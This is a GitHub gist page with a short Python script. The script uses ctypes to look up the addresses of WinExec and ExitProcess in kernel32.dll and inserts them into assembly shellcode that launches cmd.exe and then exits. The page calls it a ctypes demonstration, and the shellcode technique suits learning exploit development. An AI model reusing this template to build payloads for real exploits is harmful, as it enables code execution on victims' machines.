-
-
Save Pratik151/58fd921116ce314d796b to your computer and use it in GitHub Desktop.
Code is to show how ctypes can be used to retrieve address of functions from dll
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ctypes | |
kernel32 = ctypes.windll.kernel32 | |
handle = kernel32.LoadLibraryW(u'kernel32.dll') | |
winExec_address = kernel32.GetProcAddress(handle,'WinExec') #Gets base address of WinExec function | |
exit_address = kernel32.GetProcAddress(handle,'ExitProcess') #Gets address of ExitProcess module | |
code = ''' | |
;execcmd.asm | |
[Section .text] | |
global _start | |
_start: | |
jmp short GetCommand | |
CommandReturn: | |
pop ebx ;ebx holds the string | |
xor eax,eax | |
mov [ebx + 7],al ;insert the NULL character | |
push ebx | |
mov ebx,%s | |
call ebx ;call | |
xor eax,eax ;zero the register again, clears winexec retval | |
push eax | |
mov ebx, %s | |
call ebx ;call ExitProcess(0); | |
GetCommand: | |
;the N at the end of the db will be replaced with a null character | |
call CommandReturn | |
db "cmd.exeN" | |
''' % (hex(winExec_address), hex(exit_address)) | |
print code |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment